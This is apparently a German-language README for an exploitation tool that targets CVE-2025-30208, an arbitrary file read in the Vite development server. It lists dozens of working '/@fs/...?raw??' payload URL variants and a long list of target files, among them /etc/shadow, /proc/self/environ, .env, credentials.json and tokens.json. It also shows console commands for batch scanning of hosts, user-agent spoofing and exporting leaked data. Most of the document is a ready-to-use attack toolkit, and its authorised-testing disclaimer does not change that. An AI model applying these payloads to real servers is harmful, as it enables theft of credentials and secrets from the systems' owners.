
CVE‑2025‑30208 ist eine Sicherheitslücke mittlerer Schwere, die beliebiges Lesen von Dateien im Vite-Entwicklungsserver (einem beliebten Frontend-Build-Tool) ermöglicht.
Fortschrittlicher Schwachstellenscanner für CVE-2025-30208 mit Enterprise-Funktionen
Professionelles Penetrationstest-Tool zur Erkennung der Vite-Schwachstelle „Arbitrary File Read“
🚀 Schnellstart • 📋 Funktionen • 🔧 Verwendung • 📊 Beispiele • 🛡️ Sicherheit
Dies ist ein umfassender Schwachstellenscanner, der entwickelt wurde, um die Schwachstelle CVE-2025-30208 in Vite-Entwicklungsservern zu erkennen und auszunutzen. Die Schwachstelle ermöglicht den beliebigen Lesezugriff auf Dateien (Arbitrary File Read) über die Dateisystem-Endpunkte von Vite und kann potenziell sensible Konfigurationsdateien, Quellcode und Systeminformationen offenlegen.
Das Tool verfügt nun über eine modulare Architektur für bessere Wartbarkeit und Erweiterbarkeit:
CVE-2025-30208.py - Haupt-Scanner-Anwendungpayloads.py - Fortschrittliche Exploit-Payloads (60+ Variationen)sensitive_files.py - Umfassende Datenbank sensibler Dateien (200+ Dateien)html_template.py - Erweitertes HTML-Reporting-Template im Hacker-Stilpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]
CVE-2025-30208 > scan
# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Generate beautiful HTML report
CVE-2025-30208 > pull
# Start web server to view report
CVE-2025-30208 > web
# Start web server on specific port
CVE-2025-30208 > web 8081
# Stop web server
CVE-2025-30208 > web off
Der Scanner verwendet nun 60+ verschiedene Payload-Varianten, die in payloads.py organisiert sind:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
Das Tool testet nun 200+ sensible Dateien, die in sensitive_files.py organisiert sind:
/etc/passwd - Benutzerkontoinformationen/etc/shadow - Verschlüsselte Passwortdaten/etc/services - Netzwerkdienste/etc/hosts - Hostname-Zuordnungen/etc/fstab - Dateisystemtabelle/etc/ssh/sshd_config - SSH-Serverkonfiguration/etc/crontab - System-Cron-Jobs/etc/sudoers - Sudo-Konfiguration/proc/version - Kernelversion/proc/cpuinfo - CPU-Informationen/proc/meminfo - Speicherinformationen/proc/self/environ - Prozessumgebung/proc/self/cmdline - Prozess-Befehlszeile/proc/net/tcp - TCP-Verbindungen/proc/net/udp - UDP-Verbindungen.env - Umgebungsvariablen.env.local - Lokale Umgebung.env.production - Produktionsumgebungconfig.json - Anwendungskonfigurationsettings.json - Anwendungseinstellungenapplication.properties - Spring-Konfigurationapplication.yml - YAML-Konfigurationdatabase.yml - Datenbankkonfigurationsecrets.json - Geheimnisverwaltungpackage.json - Node.js-Abhängigkeitenpackage-lock.json - Gesperrte Abhängigkeitenyarn.lock - Yarn-Sperrdateivite.config.js - Vite-Konfigurationvite.config.ts - TypeScript-Vite-Konfigurationtsconfig.json - TypeScript-Konfigurationwebpack.config.js - Webpack-Konfigurationnext.config.js - Next.js-Konfigurationnuxt.config.js - Nuxt.js-Konfigurationangular.json - Angular-Konfigurationvue.config.js - Vue.js-Konfigurationrollup.config.js - Rollup-Konfigurationeslint.config.js - ESLint-Konfiguration.git/config - Git-Konfiguration.gitignore - Git-Ignore-Regeln.gitattributes - Git-Attribute.gitmodules - Git-Submodule.git/HEAD - Aktueller Branch.git/logs/HEAD - Git-Logs.git/refs/heads/master - Master-Branch.git/refs/heads/main - Main-BranchREADME.md - ProjektdokumentationCHANGELOG.md - ÄnderungsprotokollLICENSE - LizenzinformationenCONTRIBUTING.md - Richtlinien für BeiträgeAUTHORS - AutoreninformationenTODO.md - AufgabenlisteROADMAP.md - Entwicklungs-RoadmapDockerfile - Docker-Konfigurationdocker-compose.yml - Docker Composedocker-compose.override.yml - Override-Konfiguration.dockerignore - Docker-Ignore-Regelndocker-compose.prod.yml - Produktionskonfigurationdocker-compose.dev.yml - Entwicklungskonfigurationnginx.conf - Nginx-Konfigurationapache2.conf - Apache-Konfigurationhttpd.conf - HTTP-Daemon-Konfiguration.htaccess - Apache-Zugriffskontrolleweb.config - IIS-Konfigurationrobots.txt - Suchmaschinen-Anweisungensitemap.xml - Seitenstrukturmanifest.json - Web-App-Manifestsw.js - Service Workerfirebase.json - Firebase-Konfigurationfirebase.rules - Firebase-Sicherheitsregelnboot.ini - Boot-Konfigurationautoexec.bat - Auto-Executionsskriptsystem.ini - Systemkonfigurationwin.ini - Windows-KonfigurationUsers - BenutzerverzeichnisseWindows - SystemdateienProgram Files - AnwendungsverzeichnisseSystem - SystemdateienLibrary - BibliotheksdateienApplications - Anwendungsdateienprivate/etc/hosts - Hosts-Dateiprivate/etc/passwd - Benutzerkontendatabase.db - SQLite-Datenbankdatabase.sqlite - SQLite-Datenbankdata.db - Datendatenbankdump.sql - Datenbank-Dumpschema.sql - Datenbankschemamigrations - Datenbankmigrationenlogs - Logverzeichniserror.log - Fehlerprotokolleaccess.log - Zugriffsprotokolleapp.log - Anwendungsprotokolledebug.log - Debug-Protokollecombined.log - Kombinierte Protokollebackup - Sicherungsverzeichnisbackup.sql - Datenbanksicherungbackup.zip - Komprimierte Sicherungdump - Datendumpexport - Datenexportauth.json - Authentifizierungskonfigurationcredentials.json - Speicher für Anmeldedatenkeys.json - Schlüsselverwaltungtokens.json - Token-Speicherjwt.json - JWT-Konfigurationoauth.json - OAuth-Konfigurationapi.json - API-Konfigurationswagger.json - API-Dokumentationopenapi.json - OpenAPI-Spezifikationgraphql.json - GraphQL-Konfigurationschema.json - API-Schemacloudformation.yml - AWS CloudFormationserverless.yml - Serverless-Konfigurationterraform.tf - Terraform-Konfigurationkubernetes.yml - Kubernetes-Konfigurationk8s.yml - Kubernetes-Konfigurationanalytics.json - Analyse-Konfigurationmonitoring.json - Monitoring-Einrichtungmetrics.json - Metriken-Konfigurationtelemetry.json - TelemetriedatenDas Tool erzeugt nun ansprechende HTML-Berichte im Hacker-Stil mit:
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # Main scanner application
├── payloads.py # Advanced exploitation payloads (60+)
├── sensitive_files.py # Sensitive file database (200+)
├── html_template.py # Enhanced HTML reporting template
├── README.md # This documentation
├── requirements.txt # Python dependencies
├── logs/ # Log files directory
├── data_leak.html # Generated HTML reports
├── data_leak.json # Generated JSON reports
└── session.json # Saved session configurations
Wir freuen uns über Beiträge zur Verbesserung dieses Tools:
payloads.pysensitive_files.pyhtml_template.pyDieses Projekt ist nur für Bildungszwecke und autorisierte Sicherheitstests lizenziert.
⚠️ Rechtlicher Hinweis: Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Forschungszwecke bestimmt. Die Benutzer sind dafür verantwortlich, sicherzustellen, dass sie vor dem Testen von Systemen über die entsprechende Genehmigung verfügen. Die Autoren übernehmen keine Verantwortung für eine missbräuchliche Verwendung dieses Tools.
⭐ Wenn Ihnen dieses Tool geholfen hat, geben Sie ihm bitte einen Stern! ⭐
Mit ❤️ für die Sicherheits-Community erstellt
| Befehl | Beschreibung | Beispiel |
|---|
set <option> <value> | Konfigurationsoptionen festlegen | set RHOST 192.168.1.100 |
show options | Aktuelle Einstellungen anzeigen | show options |
edit | Interaktiver Optionseditor | edit |
run / exploit | Schwachstellentest ausführen | run |
batch | Mehrere Ziele im Stapel scannen | batch |
scan | Sensible Dateien finden | scan |
pull | Ergebnisse nach HTML/JSON exportieren | pull |
web [on|off|port] | Webserver für HTML-Berichte | web 8080 |
save | Sitzungskonfiguration speichern | save |
load | Sitzungskonfiguration laden | load |
test | Konnektivität zum Ziel testen | test |
validate | Aktuelle Konfiguration validieren | validate |
verbose | Ausführlichen Modus umschalten | verbose |
proxy | Proxy-Einstellungen konfigurieren | proxy |
headers | Benutzerdefinierte HTTP-Header festlegen | headers |
rate | Ratenbegrenzung konfigurieren | rate |
log | Protokollinformationen anzeigen | log |
help / ? | Hilfe anzeigen | help |
exit / quit | Tool beenden | exit |
| Option | Beschreibung | Standard | Validierung |
|---|
RHOST | Ziel-Host/IP-Adresse | - | Hostname/IP-Validierung |
RPORT | Ziel-Portnummer | - | Portbereich (1-65535) |
FILEPATH | Zu testender Dateipfad | etc/passwd | Pfadvalidierung |
PROXY | HTTP/HTTPS-Proxy-URL | - | URL-Formatvalidierung |
VERBOSE | Ausführliche Ausgabe aktivieren | false | Boolesche Validierung |
RATE_LIMIT | Verzögerung zwischen Anfragen (Sekunden) | 0.3 | Numerische Validierung |
THREADS | Anzahl der Threads für Stapel-Scanning | 5 | Ganzzahl-Validierung |
TIMEOUT | Anfrage-Timeout (Sekunden) | 5 | Ganzzahl-Validierung |
CUSTOM_HEADERS | Benutzerdefinierte HTTP-Header (JSON) | {} | JSON-Formatvalidierung |
prettier.config.js - Prettier-Konfigurationjest.config.js - Jest-Konfigurationbabel.config.js - Babel-Konfigurationtailwind.config.js - Tailwind-CSS-Konfiguration| Datei | Beschreibung | Format |
|---|
data_leak.html | Erweiterter HTML-Schwachstellenbericht im Hacker-Stil | HTML |
data_leak.json | Strukturierter JSON-Export | JSON |
sensitive_files_discovery.json | Erkannte sensible Dateien | JSON |
session.json | Gespeicherte Sitzungskonfiguration | JSON |
logs/cve_2025_30208_YYYYMMDD_HHMMSS.log | Detaillierte Audit-Protokolle | Text |